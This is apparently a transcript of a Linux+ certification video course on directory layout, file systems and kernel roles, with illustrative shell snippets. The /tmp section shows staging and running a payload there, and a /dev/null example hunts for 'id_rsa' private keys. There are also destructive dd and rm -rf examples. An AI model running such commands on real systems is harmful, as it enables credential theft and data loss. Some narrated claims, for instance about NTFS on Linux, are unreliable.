    Now, the benefits of this certification for IT professionals, even if you never get certified and just get really good at Linux and put the skills on your resume and portfolio. There’s industry recognition and career advancement: Linux+ is a globally recognized certification, valued in IT roles like system administration, DevOps, cybersecurity, and cloud computing. It’s a gateway for professionals seeking to specialize in Linux-based systems, and it validates versatile skills: system configuration, troubleshooting, security. Employers appreciate people who have certifications, or at the very least understand the fundamentals and practical uses of Linux, and in my opinion the practical side is what matters most. I know plenty of people without degrees or certifications who are very capable and get hired into big roles, mainly because if you claim a skill on your resume, the application process will include an assessment that tests your Linux skills; if you actually know what you’re doing, employers don’t care whether you hold the certificate. And of course there’s competitive advancement and salary potential: someone who knows Linux commands a higher rate than someone who doesn’t, and Linux+ is the seal of approval on that knowledge. That said, there’s a great quote: what do you call somebody who got a D in med school? Doctor. A Linux+ certificate only means the holder scored at least the minimum passing mark, and plenty of self-taught people without the cert know more about Linux environments, fundamentals, and advanced scripting than people who have it. Keep that in mind.

    Here is the structure of the Linux+ exam. The current version is XK0-005 as of this recording in November 2024. It consists of approximately 90 questions, including multiple-choice and performance-based questions, and candidates have 90 minutes to complete the examination. The passing score varies by version but is around 720 out of 900, which is 80%: score 720 and you pass, score below it and you don’t, so this is not an exam you can squeak through on a curve. The main domains covered are system management (how to install, configure, and manage Linux systems), security (implementing security best practices and understanding Linux security requirements), scripting and automation (shell scripting to automate tasks and manage resources, which is powerful whether or not you ever take the exam; learning to automate things is just good for your life), networking and storage management (configuring and troubleshooting the network, storage, and shared resources), and performance and monitoring (monitoring system performance and implementing logging). Troubleshooting and system administration fall under these domains, and we’ll go through all of it so you build a very good foundation before the intermediate and advanced material. As for prerequisites: there are no strict ones, though prior Linux experience is very useful. We will cover all the beginner-level material as well; there’s also a series of relatively short videos on Linux fundamentals and basics on this channel if you want to dip a toe in the water first, and CompTIA A+ or Network+ knowledge is super useful but not required, mostly because we’ll touch all of those fundamentals anyway. The more familiar you already are, the easier a time you’ll have with the rest, and the information will be reinforced and reaffirmed until you have a strong understanding of everything that’s going on.
    All right, let’s get into system architecture and the boot process, and first up is understanding the directory structure and the file system hierarchy of Linux. One term you’re going to hear a lot as we go through this tutorial is the FHS, the Filesystem Hierarchy Standard, and we’ll refer to it frequently: the FHS defines the Linux hierarchy structure and what each folder is commonly used for. The key directories are the big ones that come with essentially every Linux installation: / (the root), /bin (binaries), /sbin (system binaries), /etc (typically configuration files), /home (which houses the users), /var/log (logs and other variable, dynamic data under /var), /usr (user programs and data), /opt (optional software), /dev (device files), and /tmp (temporary data that typically gets wiped on reboot).

    The root directory is the top-level directory; the root is literally the root of the entire system. All the other FHS directories are inside it and are technically just extensions of it, organized hierarchically: subdirectories branch out under the root, more branch out under those, and so on, getting more and more subcategorized. The root directory is owned by the root user, who has complete control over it and, by extension, the entire machine. Its structure and contents are crucial for system stability and security, meaning you do not want to mess with it unless you really know what you’re doing; accidentally delete or modify the wrong thing and you will most likely have to reinstall Linux. Installed software packages also place their files in specific directories under the root, and sysadmins often work directly with it to configure and maintain the system. It is the home of everything, represented by a single forward slash: /.

    /bin, the binaries directory, contains essential binary executables needed during the boot process or in single-user mode. It is generally accessible to all users and houses the basic binaries: the ls binary lists files and directories, cat concatenates and displays the contents of a file on your terminal, cp copies files and directories, mv moves or renames them, and rm removes them. Those are just a few; there are dozens of binaries inside /bin.

    /sbin, the system binaries directory, holds binary executables used for system administration. Executing them typically requires root privileges, so it is not accessible to everybody, and since they involve system-level changes it is very important to know what you are doing: fdisk for creating partitions, fsck for file system checks, init for initializing the system, reboot, shutdown. These are not things you should casually open or manipulate, and if you’re watching this, you’re not yet advanced enough to need to. For the most part, unless your intrusion detection system or antivirus raises an alert involving them, you won’t interact with the system binaries directly; just know that this directory houses the administration executables and that it is meant for the root user.

    To summarize the differences: /bin is accessible to all users and holds essential user commands like ls and cp, executed as early as the boot process or single-user mode; /sbin is root-only, exists for system maintenance and administration, and its tools are run manually when needed, for example when the root user creates partitions during the initial installation. Apart from cases like that, those binaries sit unused.
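
    A small exploration sketch for the two directories just described; nothing here modifies the system:

    ```bash
    # Where does a command actually live?
    which ls       # often /usr/bin/ls (or /bin/ls on older layouts)
    type -a cp

    # Peek at essential user binaries versus admin binaries.
    ls /bin  | head
    ls /sbin | head    # fdisk, fsck, shutdown, and friends

    # On many modern distros /bin and /sbin are just symlinks into /usr:
    ls -ld /bin /sbin
    ```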
    /etc, the configuration directory, houses configuration files for many different services and applications, including the things you install manually. It is known as the control center, and its contents vary depending on your Linux distribution and the software installed: it holds the configuration that comes with the system as well as the configuration for things you download and install yourself. Key files include /etc/passwd, which houses user account information but shows only an “x” where a password hash would be, and /etc/shadow, which holds the actual user password hashes; those two files are very important in cybersecurity and ethical hacking. There is also /etc/group (group information), /etc/hosts (hostname-to-IP-address mappings), /etc/hostname (the system host name), /etc/resolv.conf (the DNS resolver configuration), the network interface configuration, and /etc/sysctl.conf (system kernel parameters). You’re mostly not going to edit these directly; aside from the occasional DNS resolver or interface tweak, or pen-testing exercises where you deliberately manipulate /etc/passwd or /etc/shadow, your interaction with these files will usually be through individual commands, often the binaries we discussed earlier, that add or remove entries for you. It is rare to open these files and edit them by hand. Service configurations live here too: an Apache web server keeps its configuration under /etc/apache2 (or /etc/httpd), nginx under /etc/nginx, MySQL under /etc/mysql, PostgreSQL under /etc/postgresql. So /etc houses configuration for system services as well as anything installed on the machine later; MySQL may not come pre-installed, but when you install it, its configuration directory and files land under /etc. Package manager configuration lives here as well: /etc/apt on Ubuntu-family systems and /etc/yum on CentOS/Red Hat systems, depending on which package manager your distribution ships with; we’ll go deeper into package managers when we reach that slide.

    As a final note, why is /etc important? System behavior: the configuration files directly influence how your system behaves. Security: as we discussed, /etc/passwd and /etc/shadow are really important, misconfigurations of any of these files pose a security risk, and the data inside them, if mishandled or accessed by somebody who shouldn’t have it, poses a massive one. Customization: you can customize the system by editing these files, either through the relevant binaries or by opening them directly; for the individual installed applications a text editor is fine, but for system-related configuration files I would only use the dedicated system binaries unless I knew exactly what I was doing, because the tools validate syntax and tell you exactly what went wrong, which is a lot of help you don’t get when configuring the file manually. Troubleshooting: many system problems can be resolved by modifying configuration files, and, vice versa, many are caused by incorrectly modifying them, so take notes and consider yourself warned. The cautions deserve their own mention: always back up configuration files before changing them; be mindful of file permissions, since incorrect permissions can lead to system instability or to a break-in; ensure the configuration has correct syntax to avoid errors; and test changes in a controlled environment before deploying to a production system. That last one is most relevant if you’re hired as a company’s system administrator: before a change goes out to the 500 or 5,000 employees in the company, you test it on one machine in a controlled environment, make sure there are no glitches, errors, or security vulnerabilities, and only once that’s approved do you deploy it to the entire production environment.
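
    A hedged sketch of that back-up-then-verify habit; sshd_config and nginx are example configs, and the SSH unit name varies by distribution:

    ```bash
    # Back up a config file before touching it; a dated copy is cheap insurance.
    sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak.$(date +%F)

    # Many daemons can syntax-check their configuration before a reload, e.g.:
    sudo sshd -t      # OpenSSH: no output means the file parses cleanly
    sudo nginx -t     # nginx, if installed

    # Apply the change in a controlled way and confirm the service is happy.
    sudo systemctl reload ssh     # the unit is named 'sshd' on RHEL-family systems
    systemctl status ssh
    ```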
    The /home directory is where user accounts are stored. Each user gets an individual directory, so if you have user1, there is a directory for user1, and inside it is the information relevant to that user, typically accessible only by user1 or by someone who has user1’s password. It is the primary location for files, documents, settings, configuration, and so on. The key directories inside will look familiar, because it is very similar to a Microsoft environment where each user has their own folders: Documents, Downloads, Music, Pictures, Public, Videos. All of those are usually accessible only by that specific user, except Public, which is used to share files with other users and is typically accessible by everybody else on the system. Everything inside a home directory is owned by that user by default, and only that user and the root user have full access to it, which ensures privacy and security. A user can customize their home directory and store essentially whatever they want, so long as they don’t install or do anything that would ruin the wider system and don’t exceed their storage limits; if they do hit a limit, they typically just get notified and have to delete some things to free up space. By default, home directories are protected from unauthorized access by anyone who does not have root permissions, is not on the sudoers list, and does not have that user’s username and password.

    The notable points: back up home directories regularly, so that a system crash or similar doesn’t cost you the data. File permissions, again, come up constantly throughout the rest of these videos, and they fall under security: if somebody is supposed to access something, they should be able to; if they’re not, they should not be able to. It’s not a complicated idea, just something you have to keep in mind as you administer a Linux machine or environment, and we’ll go through the individual file permission commands and how to set them. Storage limits: each user gets a quota so the overall system doesn’t get maxed out, and users are expected to keep theirs in mind and make room when they hit it. And keep things organized if you can; I know people with a genuinely scary desktop, just a pile of unsorted files with zero organization, who swear they know where everything is, and fine, but if I’m your manager, you’re going to learn to organize your stuff.
    /var, the variable data directory (the pronunciation is a little odd, but there it is), stores data that changes frequently, as the name implies: system logs, which are constantly updated with new activity, temporary files, mail spools, and other dynamic data. Some key subdirectories: /var/log houses all the system and application logs and is very important; it is one of the locations we refer to regularly when doing incident response in cybersecurity, or when troubleshooting after a system crashes unexpectedly. /var/mail stores all the incoming mail for users. /var/spool contains queues for various services, including print jobs, mail, and news. /var/lib holds state information for various services and applications. And /var/tmp stores temporary files created by various applications; do not confuse it with the top-level /tmp directory, which we’ll cover in a few slides.

    Why does this matter? Health monitoring: the log files in /var/log give you the data needed to reverse-engineer or backtrack what happened, whether it’s a system performance issue, a potential attack, or anything else. Security analysis: same idea. Service operations: the spool directories are crucial to services like printing and mail, so if something is wrong with your printer and it isn’t the hardware or the cabling, /var/spool is where you’d go to investigate the service side. Application state: /var/lib stores the information applications need to maintain their state, whether they’re enabled, disabled, or glitching; most likely the answer lives in that directory. Important considerations: clean up the temporary files regularly so you don’t overload your storage, and rotate your log files regularly, because on any actively used system, logs get very large, very quickly if they aren’t configured to be rotated, backed up, and wiped.
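
    A quick, hedged look at that log-growth problem; the exact log file name depends on the distribution:

    ```bash
    # What is eating space under /var?
    sudo du -sh /var/* | sort -h | tail

    # Follow a log as it grows; the main log's name depends on the distro.
    sudo tail -f /var/log/syslog   # Debian/Ubuntu (RHEL-family: /var/log/messages)

    # logrotate is what keeps logs from growing without bound; its policy lives in:
    cat /etc/logrotate.conf
    ls /etc/logrotate.d/
    ```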
Permissions on those files and directories protect system security. If somebody gets into your log directory, they can open the authentication log and erase the tracks of their ever being in your system, and that's very bad. An attacker can break in, plant a rootkit, a trojan, a worm, some kind of shell with a C2 connection so they can come and go as they please, and then erase their tracks from your logs. That should not happen, because the permissions on those logs should be kept at the root and sudo level, so that only administrators can access them, and those administrators' passwords should be complex enough that they can't simply be broken with a password-cracking tool. As I've mentioned, this will come up frequently: certain log files and directories should not be accessible by anybody other than root and the administrators. And of course, back up whatever is necessary; not everything needs backing up, but the important stuff, like log files and configuration files, does.

Next we have /usr, which holds user programs and libraries: program binaries, shared libraries, and documentation are typically stored here. There's /usr/bin for user binaries, /usr/sbin for system binaries, /usr/lib for libraries, /usr/local for locally installed software often outside the package manager (which we'll talk about later), /usr/share for shared data files like documentation and icons, and source code for various system utilities. The binaries in /usr/bin are accessible to all users, while the system binaries in /usr/sbin are typically for system administration and require root privileges; the same pattern you've seen elsewhere applies inside /usr too. One clarification worth making: despite the name, /usr is system-wide software shared by everyone, not per-user data. Individual users' files live under /home, and the root user has their own separate home directory at /root rather than anything inside /usr.

Why is this important? Program execution: /usr/bin and /usr/sbin are essential for running programs. Shared libraries are used by multiple programs to reduce disk space and improve performance: if something is installed that's accessible to all users, it lives once under /usr/lib instead of being duplicated for every single user, so there's a single installation everyone can reach. Installed software packages land in subdirectories of /usr, and system documentation lives under /usr/share.
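As a hedged illustration of locking down a log file (the path and the adm group are Debian-style conventions; other distros differ):

```bash
# Check current ownership and mode of the authentication log
ls -l /var/log/auth.log

# Typical hardening: owned by root, readable by the adm group, nobody else
sudo chown root:adm /var/log/auth.log
sudo chmod 640 /var/log/auth.log

# Confirm a regular user can no longer read it
ls -l /var/log/auth.log   # -rw-r----- 1 root adm ...
```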
The /usr/share/doc directory contains documentation for system utilities and installed software: actual manuals, for example instructions for how to use a specific utility. Key points: parts of /usr can be mounted read-only to prevent accidental modification by anyone who shouldn't be changing them. Package managers like APT and RPM manage the installation and removal of software, often modifying files within /usr, so instead of manually removing files or folders, you'd use the package manager and its uninstall command, which removes the software package along with all of its dependencies. You'll rarely be touching these files directly, which is why read-only access is the norm: modifications are typically made by the system's own binaries. Some files in /usr are accessible to all users, others require root privileges to modify, and again that falls under file permissions and user access. These are common themes, and the reason I keep repeating them is that I want them really embedded in your brain: once you see the repeated themes, you start understanding how all of these things connect. Most of this is common sense; you just need to know where things are housed and what the rules are for accessing them. A quick example of letting the package manager do the work is shown below.
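A minimal, hedged sketch using APT on a Debian-based system (the package name htop is just an example):

```bash
# Install a package: its binary lands in /usr/bin, docs in /usr/share/doc, etc.
sudo apt install htop

# See exactly which paths the package owns
dpkg -L htop | head

# Remove it, configuration files included, rather than deleting
# files out of /usr by hand
sudo apt remove --purge htop
```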
Now we have /opt, for optional software. It stores additional software packages that are not part of the base system: optional installations from third-party sources. Take OBS, for example, the software I'm using to record this presentation; that came from a third party, so its packages belong in the /opt folder. There's a screen-recording tool that came pre-installed with my machine, but that's not the one I'm using, so its contents would not be in this directory; /opt is specifically for optional software from third-party sources. And let me correct myself on one point: as we mentioned earlier, configuration files actually live in the /etc folder; /opt holds the additional software packages themselves, while the configuration files for that software go in /etc.

Why would you use this? It keeps optional software separate from the base system, the system binaries and base installations, which makes it easier to manage and remove; it prevents conflicts between different software packages, which is why we isolate them, and if something goes wrong you can backtrack to exactly where the problem came from; and it's flexible, allowing easy installation and removal of that optional software. You can technically come in and manually remove things, but even if something you installed ended up here, I'd highly recommend using the same package manager to remove it. It almost always comes down to the package manager: in a Linux environment without a GUI, like a Linux server, you're not going to get an installer file that you double-click to launch a wizard and click Next through. If you're using the command-line interface, you typically install with the package manager, which means you'd most likely use the package manager to remove things too.

The typical structure looks like this: installing something into /opt usually creates a directory named after the software, for example a MySQL directory for the MySQL software, which houses that software's binaries, libraries, configuration files, and data. Most likely there will also be a MySQL entry inside /etc for its configuration files, so you'll have MySQL under both /opt and /etc. The difference: /opt/mysql has everything, including config files; /etc/mysql has only the config files. Keep that in mind.

Key points: ownership and permissions of files and directories within /opt can vary depending on the software; whether a user or root installed it can determine the ownership and permissions. On package management: some software can be installed using the system package manager, while other software may require manual installation, which in my experience typically happens in a GUI environment; sometimes there's some other command-line tool that isn't the package manager itself (not apt, but something else) if you're only in a command-line environment.
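As a hedged sketch of that layout and the cleanup advice (the mysql directory name is just the slide's example, and mysql-server is only an example package name; whether a given vendor really installs into /opt varies):

```bash
# A typical third-party layout under /opt
ls /opt/mysql
# bin/  lib/  etc/  data/   <- binaries, libraries, config, and data together

# Preferred removal: let the package manager take it (and its
# dependencies) out, if it was installed as a package
sudo apt remove --purge mysql-server

# Manual fallback for a hand-installed /opt app: back up what you need,
# then wipe the whole directory rather than picking files out of it
sudo tar czf ~/mysql-backup.tgz /opt/mysql/data
sudo rm -rf /opt/mysql
```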
Sometimes that may be the case, but for the most part I've only ever used the package manager to install packages and their dependencies, unless I was in a GUI environment with the extract-the-files-and-double-click-the-installer routine. Configuration for software installed in /opt is often located within the software's own directory. And on cleanup: when you remove software installed in /opt, it's important to remove all the files and directories associated with it. Basically, delete the entire directory instead of going inside it and manually uninstalling pieces; if there's data you need, back it up first, then wipe the whole directory. With /opt/mysql, for example, you'd delete the entire mysql directory to make sure everything inside it is gone too.

The /dev directory houses the virtual device interface: a virtual file system that represents hardware devices as files, which allows the OS to interact with hardware using standard file operations. For example, /dev/sda and /dev/sdb represent hard disk drives ("sd" historically stands for SCSI disk): if you have multiple disks installed, "a" is the first, "b" the second, "c" the third, and so on. There's the CD-ROM, and USB drives show up here too, so external drives as well. /dev/null is a special file that discards anything written to it. When we run commands that we know will produce a lot of error messages, we redirect those errors to /dev/null, which immediately throws them away because they're pure noise. This is honestly the only thing I've used it for: I'll run a find command knowing the results will include a flood of "permission denied" messages that pollute the screen and hide the important data; within a hundred permission-denied messages there might be two results containing the data I actually want. So I point all of those error messages at /dev/null, and instead of seeing a hundred lines I only see the two that apply to me, as shown below.
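A minimal sketch of that exact pattern (the search path and filename are arbitrary examples):

```bash
# Without redirection: stderr fills the screen with "Permission denied"
find / -name "id_rsa"

# With redirection: file descriptor 2 (stderr) is sent to /dev/null,
# so only the real matches on stdout remain visible
find / -name "id_rsa" 2>/dev/null
```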
Then there's /dev/zero, a special file that produces an infinite stream of zeros. I've never had a reason to use it, so I paused the presentation and did a quick search, and here's what we got: in Linux, /dev/zero is a special file inside /dev that acts as a source of infinite null characters (ASCII value zero), meaning when you read from it you continuously receive zeros, making it useful for initializing storage with blank values. Key points: its function is to provide a stream of zeros whenever you read from it. Use cases: disk initialization, creating a completely blank disk by writing data from /dev/zero to it; memory allocation checks, seeing whether a specific amount of memory can be allocated by attempting to read a certain number of bytes from /dev/zero; and generating blank files, by redirecting output from /dev/zero to a new file. So it's basically an endless supply of zeros you pull from to initialize a disk, test allocation, or generate a blank file. Such a nerdy thing; I didn't even know it existed, but now we know.

So why is the /dev folder important? Device abstraction: by treating devices as files, Linux provides a consistent interface for interacting with various hardware devices. For example, when you plug in a USB drive, a device file is created for it, and through that the system exposes the drive's file system so you can interact with its contents. This matters most in a command-line environment: in a GUI you just click the drive and browse it in the file manager, but on the command line the device-as-file model is how you actually reach the contents. Device drivers, the software components that control hardware devices, create device files inside /dev. Your printer, for instance, has a driver you need to install before you can interact with it; if you've ever set up a new printer, you've seen the "download the driver from our website" step, and that driver is what lets you talk to the printer. Users can then access and control devices through these device files, often using commands like dd or hdparm to interact with the various entries under /dev. That's why this matters: /dev is the virtual interface to a physical device, whether that's a USB drive, a printer, or a hard disk. Key point: device files are often created dynamically, when a device is plugged in or when the system boots; plug in your USB drive and suddenly a device file for it pops up.
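A hedged sketch of those /dev/zero use cases (file names are arbitrary; be very careful with dd's of= target, since pointing it at a real disk is irreversible):

```bash
# Generate a blank 10 MB file filled with zeros
dd if=/dev/zero of=blank.img bs=1M count=10

# Verify it really is all zeros (hexdump collapses repeated lines into '*')
hexdump blank.img | head -3
# 0000000 0000 0000 0000 0000 0000 0000 0000 0000
# *
# 0a00000

# Blanking a whole disk is the same idea with of=/dev/sdX -- left as a
# comment on purpose, because it destroys everything on that disk:
#   sudo dd if=/dev/zero of=/dev/sdX bs=1M status=progress
```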
Access to device files may be restricted to root or to specific users depending on the device, and the correct device driver must be installed and loaded for a device to be accessible in /dev. USB drives typically don't require extra drivers, but printers usually do; something that acts in the physical world typically needs its own driver, and its interface ends up in /dev.

Then we have the /tmp folder, the temporary file system. It stores temporary files created by various applications and system processes, and those files are typically deleted when the application or process finishes or when the system is restarted. /tmp has write and execute permissions for everyone, which makes it a very popular target for hackers. Most of the pen-testing exercises I've done have involved creating a shell or some malicious script outside the target machine, transferring it over with something like wget or a quick Python web server, and dropping it into /tmp, precisely because /tmp is writable and executable even when I have no access to any of the other folders we just talked about: the root folder, home directories, literally anything else. There's almost always access to /tmp, so once I drop or transfer my binary, my payload, into /tmp, I can execute it from there. You can obviously change these permissions, but they typically come preconfigured this way, mostly because everything in /tmp gets deleted on reboot anyway; nothing in it is permanent, which is why it has those permissions and why it's such an attractive target.

Temporary storage gives applications a convenient place to put scratch files without cluttering the user's home directory or other permanent locations, and when you close the software those files get wiped. System processes often use /tmp during operations like package installations or system updates, and user applications such as web browsers and text editors use it too, with their files wiped afterward. It's probably one of the most volatile folders here, constantly changing based on the software you're using; nothing in it is permanent.

Key points: many systems automatically clean up /tmp on reboot, at regular intervals, or when the software that created the files closes. Be aware of the security risks associated with temp files, since they sometimes contain sensitive information and the directory is easily accessible. And if necessary, you can manually clean up /tmp using commands like rm, or rm -rf (recursive and forced).
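You can see those /tmp permissions directly; a quick hedged sketch (the trailing 't' is the sticky bit, which lets everyone write to the directory but only delete their own files, and payload.sh is a hypothetical file name):

```bash
# World-writable, world-executable, with the sticky bit set
ls -ld /tmp
# drwxrwxrwt 18 root root 4096 ... /tmp

# Any unprivileged user can drop and execute a file here --
# exactly the property attackers abuse
cp payload.sh /tmp/ && chmod +x /tmp/payload.sh && /tmp/payload.sh
```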
However, be cautious not to delete important files: before any automatic cleanup or wholesale wipe of a directory, make sure there's nothing in there you should have backed up first.

These are some of our other important directories: /boot stores the boot loader files; /dev and /lib we've already talked about; /mnt houses the mount points for removable media; /proc is a virtual file system providing information about system processes; /srv contains data for services provided by the system; and /sys is a virtual file system with information about the system's hardware, such as the CPU and GPU. What we covered in depth will come up most frequently, and you don't need the nitty-gritty on these others, but you should be aware of them; they're all part of the Filesystem Hierarchy Standard.

Okay, now into file system types and mount points. The common file system types are ext4, XFS, NTFS, and FAT32. ext4, the fourth extended file system, was designed as the successor to ext3 and ext2. It's a journaling file system for Linux, meaning it records what happens inside the file system in a journal, so that if the system crashes or there's a power failure it can pick up where it left off. It supports large files, up to 16 terabytes each, which is massive and makes it suitable for storing large media files and databases; it supports file systems of up to one exabyte, accommodating enormous storage needs; it has improved performance, especially on large file systems; and it's designed to be extensible, allowing for future enhancements and features (hopefully you can read the bottom of this slide, which says exactly that). Those are the key features of ext4.

Then there's the XFS file system, which also uses journaling and is built for high performance, scalability, and reliability. It's used for large file systems and high-performance workloads, so typically an enterprise environment. It's optimized for sequential read and write operations, making it ideal for file servers and databases, and it can handle file systems up to 8 exabytes, which is pretty freaking massive. Very much like ext4, it uses journaling to ensure data integrity in case of crashes, and it scales to a large number of files and directories, which is great for file servers with many users; typically it's used for a central file server that a lot of remote users access, making it easy to scale up storage and add users.
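A hedged sketch for seeing which of these file systems your own machine is actually using (device names like sda1 differ per system, and the output shown is illustrative):

```bash
# File system type of every mounted volume
df -T

# Per-block-device view, including unmounted partitions
lsblk -f
# NAME   FSTYPE LABEL UUID  MOUNTPOINT
# sda1   ext4         ...   /
# sdb1   xfs          ...   /srv/data
```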
Then there's flexibility: XFS supports online file system resizing and real-time defragmentation, which makes it very flexible; you can make certain modifications to an XFS file system without removing permissions or taking away access to it. It's typically used for large databases or data centers with many users. Common use cases: high-performance servers, like web servers, database servers, and file servers; a server essentially serves data that others pull from one central location, for example a web server that multiple users visit or a database that multiple users query. NAS devices, network-attached storage, often use XFS to store large amounts of data, and XFS can also serve as the file system for virtual machine disk images. Quick note: a network-attached storage device is essentially a fancy name for a storage server; it's a physical box that stores a lot of data, attached to a network so it's accessible over a network connection, and it typically uses a file system like XFS to house that data so other people can reach it.

Next, NTFS, the New Technology File System, which is used on modern Windows operating systems; it's reliable, secure, and performs well. The reason you need to know it is that you'll often need to format a drive that has to interoperate with NTFS, or at least understand it in the context of Windows machines and Linux machines working together: if one person is on Linux and another is on Windows, both should still be able to reach your overall server, your XFS file system for example, and pull the data they need. That's really why we're even talking about NTFS. It offers robust security features like access control lists, which allow granular control over file and folder permissions; it uses journaling, very similar to everything else we've covered, to improve data integrity and recoverability; it's optimized for performance, especially on modern hardware; and it supports large files and large file systems. It's a very solid file system, and its use on modern Windows machines says as much. One caveat, based on my experience at least: a drive formatted NTFS typically can't be used from a Linux machine out of the box. What you want for sharing is dual formatting, and when you pick a format both systems handle, it's usually not NTFS; NTFS is very much dedicated to Windows. Compression is another feature: NTFS supports file and folder compression to save disk space.
It also lets you encrypt files and folders to protect sensitive data, meaning you can effectively password-protect them, and it supports hard links and symbolic links, which provide flexibility in file management. A hard link is a direct reference to a file's data, essentially creating a duplicate directory entry for the same file data, while a symbolic link (also called a soft link) is a file that stores the path to another file, acting like a shortcut that points to the original file's location. So with a hard link, multiple file names access the same data; a symbolic link just points to the original file's path, like a desktop shortcut. That's the main difference: a hard link is another name for the same data, a symbolic link is a shortcut to the file (see the sketch after this section).

Common uses of NTFS: it's the default file system for the more recent versions of Windows (NT, 2000, XP, Vista, 7, 8, 10, and 11); many external hard drives are formatted with NTFS, especially those designed for Windows systems; and USB drives can be formatted with NTFS to store large files and folders, though you can reformat them so both types of machines, macOS as well as Windows, can use them.

Then we have the FAT32 file system, by far my favorite file system name: the File Allocation Table 32. It dates from the early days of personal computing, and it's not as feature-rich as NTFS or ext4, but it remains popular due to its simplicity and broad compatibility, and it's still used in a lot of environments. Key features: it's relatively simple, which makes it easy to implement; it's compatible with a wide range of operating systems, including Windows, macOS, and various Linux distributions, so it's genuinely cross-platform; and it offers read and write access, letting you create, modify, and delete files. It does have limits: a maximum file size of 4 GB and a maximum partition size of 2 TB. A 2 TB partition is still fairly big, especially if you're dealing with one person, one user, but you're most likely not going to use FAT32 in an enterprise environment with many users and a lot of data. For the most part FAT32 serves one individual: a home computer, a USB drive, or an external hard drive capped at 2 TB. Common use cases: USB flash drives, memory cards for digital cameras and other devices, and external hard drives of 2 TB or less. That's actually what I did for most of my external drives; since none of them go past 2 TB, I format them FAT32 when I can, so I can use them on my Windows machine as well as my macOS and Linux machines.
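Two hedged sketches tying this together: the hard-link vs. symlink difference, and formatting a small drive FAT32 for cross-platform use (/dev/sdX1 is a placeholder; double-check the device name before formatting, since this erases it):

```bash
# Hard link vs. symbolic link
echo "hello" > original.txt
ln original.txt hard.txt        # second name for the same data
ln -s original.txt soft.txt     # shortcut that stores the path
ls -li original.txt hard.txt soft.txt
# original.txt and hard.txt share one inode number; soft.txt has its own

rm original.txt
cat hard.txt    # still prints "hello" -- the data survives
cat soft.txt    # fails: the path it points to is gone

# Formatting a USB stick FAT32 so Windows, macOS, and Linux can all use it
sudo mkfs.vfat -F 32 /dev/sdX1
```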
All right, now we can go into the system architecture: the kernel, the shell, and the user space. The kernel is the core component of a Linux-based operating system. It's the bridge between the hardware and software layers, managing system resources and facilitating communication. If you make a request, a call, to the system, say you ask your CPU to perform an action, the kernel is the middle ground between the software that made that call and the CPU carrying it out. It's the bridge between the hardware (the CPU, the GPU, the motherboard, and so on) and the software layers: when your text editor makes a call, the kernel translates and transfers that call to the actual hardware.

The key roles of the kernel are resource management plus several specific management types: memory management, process management, device management, and file system management. It allocates and deallocates memory to processes as needed (we're talking about RAM here, the processing memory, not storage); it creates, schedules, and terminates processes; it controls access to hardware devices like disk drives, network cards, and printers; and it manages the file systems, providing access to files and directories.

On memory management specifically: the kernel allocates memory to processes as needed, dividing physical memory into virtual memory segments. There's page-fault handling; a page is just a fixed-size chunk of memory data, and if a process tries to access a memory page that isn't currently in physical memory, the kernel triggers a page fault and loads the missing page from disk. Then there's swapping: when physical memory is scarce, typically on an older computer or one without much RAM, say 4 GB or less, the kernel swaps inactive pages out to disk to free up memory for active processes. We refer to that area as swap space, and we'll talk about it a lot later, but the short version is that when physical memory runs low, the kernel is responsible for shuffling pages between physical memory and the swap space so the system doesn't crash and your active processes still get the memory they need. So that's memory management: allocating memory, handling page faults by retrieving the missing data from disk, and managing the swap between physical memory and virtual memory pages so the computer keeps running.
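A hedged sketch for watching that memory management from user space (the output values shown are illustrative):

```bash
# RAM and swap usage at a glance
free -h
#        total   used   free   shared  buff/cache  available
# Mem:   7.7Gi   2.1Gi  3.2Gi  ...
# Swap:  2.0Gi   0B     2.0Gi

# Which devices or files back the swap space
swapon --show

# Per-second virtual-memory stats: the si/so columns show pages
# being swapped in and out of physical memory
vmstat 1 5
```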
Then we have process management. Process creation and termination is one of the big ones: the kernel creates new processes, assigns each a unique process identifier (a PID), and terminates them when they're no longer needed; when you close a program, the process is terminated and its PID goes away. Process scheduling: anything that should run at a certain time, on boot, every day, every five minutes, is scheduled through the kernel, and CPU time is allocated efficiently by the kernel. Context switching: the kernel switches between different processes, saving one's state and restoring the state of the next one to be executed. For example, if you go from Google Chrome to your text editor and then back to Chrome, you pick up right where you left off; that's a context switch, and the kernel handles saving and restoring each process's state so you can continue with business as usual. Inter-process communication is also facilitated by the kernel, letting processes share information and synchronize their activities; copy-paste is an everyday example, taking something from one application and pasting it into another, and two integrated processes that rely on each other communicate through the kernel as well (see the pipe sketch after this passage). Whether a process is in the foreground, something you can visibly see, or the background, something running invisibly, the conversations between processes, between physical drives and the CPU and your software, all go through the kernel to keep the computer running properly.

Then there's device management: loading and unloading device drivers, the software components that interact with specific hardware, so you can communicate with physical devices. There are input/output operations: a mouse click or a keystroke is input (the mouse and keyboard are input devices), and the computer's reaction, opening what you clicked or printing the character to your screen, is the output. The kernel handles that I/O, transferring data between devices and memory. The kernel also responds to interrupts generated by hardware devices like disk drives and network cards; any interruption within those operations is handled by the kernel too.
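As a small hedged illustration of kernel-mediated inter-process communication: a shell pipe is exactly that, a kernel object that one process writes into and another reads from.

```bash
# The kernel creates a pipe, runs both processes, and shuttles
# bytes between them: ps writes, grep reads.
ps aux | grep ssh

# A named pipe makes the kernel object visible in the file system
mkfifo /tmp/demo.pipe
echo "hello from process A" > /tmp/demo.pipe &   # writer blocks until...
cat /tmp/demo.pipe                               # ...a reader shows up
rm /tmp/demo.pipe
```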
The Hardware Abstraction Layer, also known as HAL, is another role handled by the kernel: a consistent interface for software to interact with hardware, hiding the complexities of different architectures. This abstraction allows software to run on various hardware platforms without requiring significant modifications. Hardware really does vary: 4 GB of RAM is different from 16 GB, one brand of CPU is different from an Nvidia chip or whatever else, and the HAL lets the software you're using interact with these different types of hardware without any modification. You don't need to modify your program to run on a 4 GB machine (it might just run a little slower) or a 32 GB machine; the kernel handles all of that translation for you.

Then we have system calls, which I've already touched on: a user-level program interacting with the kernel to request services is making a system call. You make a call to the system to do something for you. You ask your calculator to process a calculation: the kernel transfers that request to the CPU, the CPU processes it, and the result comes back to the calculator as your output. That round trip is a system call. System calls enable programs to perform tasks like creating files, reading and writing data, making network connections, doing calculations, playing a video, and so on; we'll watch some happen in the sketch below.

